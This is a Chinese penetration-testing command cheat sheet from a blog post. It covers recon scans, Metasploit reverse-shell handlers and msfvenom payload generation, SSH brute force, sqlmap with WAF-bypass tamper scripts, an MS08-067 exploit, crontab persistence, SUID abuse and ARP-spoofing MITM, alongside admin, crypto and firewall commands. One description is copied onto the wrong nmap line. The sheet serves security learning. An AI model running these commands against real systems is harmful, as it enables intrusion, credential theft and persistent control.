超好用实战系列的渗透攻防命令速查

免责申明:
以下内容仅是作为学习使用,如有别人使用影响网络安全,本人概不负责
网盘资源链接:https://pan.quark.cn/s/a900691a3ec3
红队全栈公益课链接:https://space.bilibili.com/350329294

一、信息收集与分析

nmap、masscan、theHarvester、dig和curl是网络安全和信息收集中常用的工具。

1. nmap -sV -O -A -p 80 目标IP
nmap命令通过选项-sV、-O、-A和-p-,可以全面扫描目标主机,识别开放端口、服务版本、操作系统类型及潜在漏洞,适合深入分析单一目标。
解释:-sV选项用于检测服务版本
-O用于检测操作系统类型
-A启用操作系统和服务检测的高级选项
-p 80 表示扫描端口。

2. masscan -p1-65535 -rate=10000 目标IP
masscan则以极高的速度(每秒10000个数据包)扫描指定IP段的所有端口,适合快速发现大量主机的开放端口,适用于大规模网络环境。
解释:这个命令以每秒10000个数据包的速度扫描指定IP段的所有端口。

3. theHarvester -d 域名 -l 500 -b 目标IP
theHarvester专注于信息收集,通过指定域名搜索最多500个相关结果,能够从多个来源(如搜索引擎和DNS查询)提取电子邮件地址、子域名和主机名,适合进行信息侦查。

4. dig +short -x 目标IP
dig工具用于反向DNS查询,通过输入目标IP,可以获取与之关联的域名信息,帮助识别目标的网络结构。

5. curl -I -L -H “User-Agent: 自定义User-Agent” 目标URL
curl命令则用于发送HTTP请求,通过自定义User-Agent,可以获取目标Web服务器的响应头信息,适合进行Web服务的测试和分析

这些工具在网络安全测试和信息收集过程中各有其独特的应用场景。

二、漏洞扫描与利用

在网络安全领域,以上命令涉及多种渗透测试工具的使用,主要用于攻击和测试系统的安全性。

  1. msfconsole命令用于配置Metasploit框架中的监听器,等待目标主机的反向连接。这是通过设置有效载荷为Windows的Meterpreter实现的,适合进行后渗透操作。
    命名如下:
    msfconsole -x “use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 本地IP; set LPORT 端口号; exploit”

  2. sqlmap命令用于自动化SQL注入测试,指定目标URL和数据库类型为MySQL。通过设置高风险和高测试级别,用户可以深入测试目标的数据库安全性。
    命令如下:sqlmap -u “目标URL?param=value” --dbms=MySQL --level=5 --risk=3 --batch --random-agent

  3. hydra工具用于对SSH服务进行暴力破解。用户可以指定用户名、密码字典和线程数,以提高破解效率。
    命令如下:hydra -l 用户名 -P 密码字典 -t 线程数 ssh://目标IP

  4. john the ripper命令用于破解加密哈希,支持多种哈希格式。通过指定密码字典和规则集,用户可以增强破解的成功率。
    命令如下:
    john --wordlist=密码字典 --rules --format=类型 加密哈希

  5. msfvenom命令用于生成恶意软件,创建一个Windows反向TCP Meterpreter有效载荷的可执行文件。这是攻击者常用的手段,用于在目标系统上建立持久的控制。
    命令如下:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地IP LPORT=端口号 -f exe > 恶意软件.exe

这些命令展示了渗透测试中的多种技术手段,强调了网络安全的重要性和复杂性。

三、权限提升与持久化

在信息安全和系统管理中,权限提升是一个重要的概念,涉及到如何在操作系统中获取更高的权限以执行特定任务。以下是一些常见的权限提升方法:

  1. 在Windows系统中,可以使用PowerShell命令 powershell -ExecutionPolicy Bypass -File 权限提升脚本.ps1 来绕过执行策略,运行一个特定的权限提升脚本。这种方法常用于执行未签名的脚本。

  2. 在Unix/Linux系统中,使用 sudo -l 命令可以列出当前用户可以执行的sudo命令,然后通过 sudo -u root /bin/bash 启动一个以root用户身份运行的bash shell,从而获得更高的权限。

  3. 使用 find / -perm -4000 2>/dev/null 命令可以查找系统中所有具有SUID权限的文件,这些文件在执行时会以文件所有者的权限运行,通常用于识别潜在的安全风险。

  4. 通过 chmod u+s 可执行文件 命令,可以为指定的可执行文件设置SUID权限,使其在执行时以文件所有者的权限运行。

  5. 最后,通过 echo 'shell脚本内容' | sudo tee /etc/crontab 可以将shell脚本内容写入crontab文件,实现定时任务的持久化,这样即使系统重启,任务依然会按计划执行。

这些方法在系统管理和安全测试中非常常见,但也可能被恶意用户利用,因此需要谨慎使用。

四、网络流量分析与捕获

tcpdump、Wireshark、Tshark、Scapy和Ettercap是网络流量捕获和分析的常用工具。

  1. tcpdump:通过指定网络接口和过滤表达式,tcpdump可以捕获并保存网络流量到.pcap文件中。这种方式适合需要在命令行环境下快速捕获数据的场景。
    命令如下:
    tcpdump -i 接口名 -w 捕获文件.pcap ‘过滤表达式’

  2. Wireshark:这是一个图形化的网络协议分析工具。使用Wireshark可以打开之前用tcpdump或Tshark捕获的.pcap文件,并通过过滤表达式筛选出感兴趣的数据,以文本格式展示,便于分析。
    命令如下:
    wireshark -r 捕获文件.pcap -Y ‘过滤表达式’ -T text

  3. Tshark:作为Wireshark的命令行版本,Tshark同样可以在指定接口上捕获流量,并应用捕获过滤器,结果保存为.pcapng文件,适合在无图形界面的环境中使用。
    命令如下:
     tshark -i 接口名 -f ‘捕获过滤器’ -w 捕获文件.pcapng

  4. Scapy:这是一个强大的Python库,支持网络流量的生成、捕获和分析。用户可以编写脚本来实现复杂的网络操作,灵活性高。
    命令如下:scapy 脚本.py

  5. Ettercap:该工具用于执行中间人攻击,特别是在ARP欺骗场景中。通过指定目标IP,Ettercap可以在网络中拦截和修改数据包,适合网络安全测试和研究。
    命令如下:ettercap -T -i 接口名 -M arp:remote /目标IP1//目标IP2//

这些工具各有特点,适用于不同的网络分析需求。

五、Web渗透测试

Burp Suite和OWASP ZAP是常用的网络安全测试工具。通过命令行启动Burp Suite时,可以指定项目名称和代理监听器的IP及端口,以便进行流量捕获和分析。
命令如下:burpsuite --project=项目名 --proxy-listeners=本地IP:端口

OWASP ZAP则可以以守护进程模式运行,监听所有IP地址的请求,并禁用API密钥验证,方便进行自动化测试。
命令如下:owasp-zap -daemon -host 0.0.0.0 -port 端口号 -config api.disablekey=true

使用curl命令可以发送HTTP POST请求,适用于测试Web表单的提交。通过设置请求头和数据,可以模拟用户提交表单的行为。
命令如下:curl -X POST -d “参数名=参数值” -H “Content-Type: application/x-www-form-urlencoded” 目标URL

SQLMap是一个强大的SQL注入测试工具,能够自动化检测和利用SQL注入漏洞。通过指定目标URL、数据库类型、测试级别和风险等级,用户可以深入测试应用程序的安全性。此外,使用tamper脚本可以帮助绕过Web应用防火墙(WAF)的检测。
命令如下:sqlmap -u “目标URL” --batch --dbms=PostgreSQL --level=3 --risk=2 --tamper=tamper脚本

Gobuster是用于目录爆破的工具,可以通过指定目标URL、字典文件和线程数来快速发现隐藏的目录和文件。这对于渗透测试和安全评估非常有用。通过这些工具,安全测试人员可以有效地识别和利用潜在的安全漏洞。
命令如下:
gobuster dir -u 目标URL -w 字典文件 -t 线程数

六、系统维护与日志分析

使用命令行工具可以有效地监控和管理系统资源。以下是一些常用的命令及其功能:

  1. top -b -n 1 | grep 进程名 | awk '{print $9}' | tr -d 'm|k|G|t|%':此命令通过top获取系统性能信息,筛选出指定进程的内存使用量,并去除单位,方便后续处理。

  2. ps -ef | grep 进程名 | grep -v grep:该命令用于查找并列出系统中正在运行的指定进程,grep -v grep用于排除自身的匹配结果。

  3. df -h | awk '$NF=="/"{printf "磁盘使用率: %d/%dGB (%.2f%%)\n", $3/$1024,$2/$1024,$5 ""}':此命令格式化显示根目录的磁盘使用情况,包括已用空间、总空间和使用率,便于监控磁盘状态。

  4. grep '关键字' /var/log/系统日志文件 | awk '{print $1, $2, $3, $4, $7}':在系统日志中搜索包含指定关键字的行,并提取时间戳、主机名、进程ID和日志消息,便于快速定位问题。

  5. awk '/关键字/ {print $0}' /var/log/auth.log | sort | uniq -c | sort -nr:此命令在认证日志中搜索指定关键字,统计出现次数并按降序排列,帮助分析安全事件。

这些命令结合使用,可以有效地进行系统监控和故障排查。

七、高级攻击与防御技术

1. mitmproxy -s 脚本文件.py• 借助 mitmproxy 工具,加载特定的 Python 脚本,实现对 HTTP/HTTPS 流量的拦截、修改以及分析。

2. meterpreter > run post/windows/gather/check_vm• 在 Meterpreter 会话中执行后渗透模块,以此检测目标系统是否为虚拟机

3. msfconsole -q -x “use exploit/windows/smb/ms08_067_netapi; set RHOST 目标IP; exploit”• 通过 msfconsole 以静默模式运行 SMB 漏洞利用模块,对指定目标 IP 发起攻击

4. nmap --script=漏洞脚本 -p 端口号 目标IP• 通过 msfconsole 以静默模式运行 SMB 漏洞利用模块,对指定目标 IP 发起攻击

5. arpspoof -i 接口名 -t 目标IP 网关IP• 利用 arpspoof 工具,对指定目标 IP 进行 ARP 欺骗,将其流量重定向至指定网关 IP

八、密码学与加密技术

1. openssl genpkey -algorithm RSA -out 私钥文件.pem -pkeyopt rsa_keygen_bits:2048・运用 OpenSSL 工具创建一个长度为 2048 位的 RSA 私钥文件并存储在指定的私钥文件.pem 中

2. openssl req -new -key 私钥文件.pem -out 证书请求文件.csr・依据现有的私钥文件生成相应的证书签名请求(CSR)文件

3. openssl x509 -req -days 365 -in 证书请求文件.csr -signkey 私钥文件.pem -out 自签名证书.crt・利用私钥文件对证书请求文件(CSR)进行签名操作,从而生成一份自签名证书,该证书的有效时长为 365 天

4. gpg --encrypt --recipient 接收者公钥 ID 文件名・运用 GPG 工具对文件实施加密操作,同时指定接收者的公钥 ID

5. ssh-keygen -t rsa -b 4096 -C “注释”・利用 ssh-keygen 工具创建一个 4096 位的 RSA SSH 密钥对,同时添加相应的注释信息

九、其他高级命令

1. strace -p 进程 ID -e trace=network・运用 strace 工具对指定进程的网络活动进行跟踪。

2. lsof -i -P -n・展示当前系统内所有开启的网络连接及监听端口信息

3. perf top・借助 perf 工具对系统性能瓶颈进行实时监测与分析

4. bcrypt.hashpw (’ 密码 ', bcrypt.gensalt ())・运用 Python 的 bcrypt 库将密码进行哈希运算,以生成安全的密码散列值

5. iptables -A INPUT -p tcp --dport 22 -j DROP・采用 iptables 规则禁止所有针对 SSH 端口(22)的入站 TCP 连接

6. nft add rule ip filter input iif lo accept・运用 nftables 规则许可来自回环接口的数据包通行

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值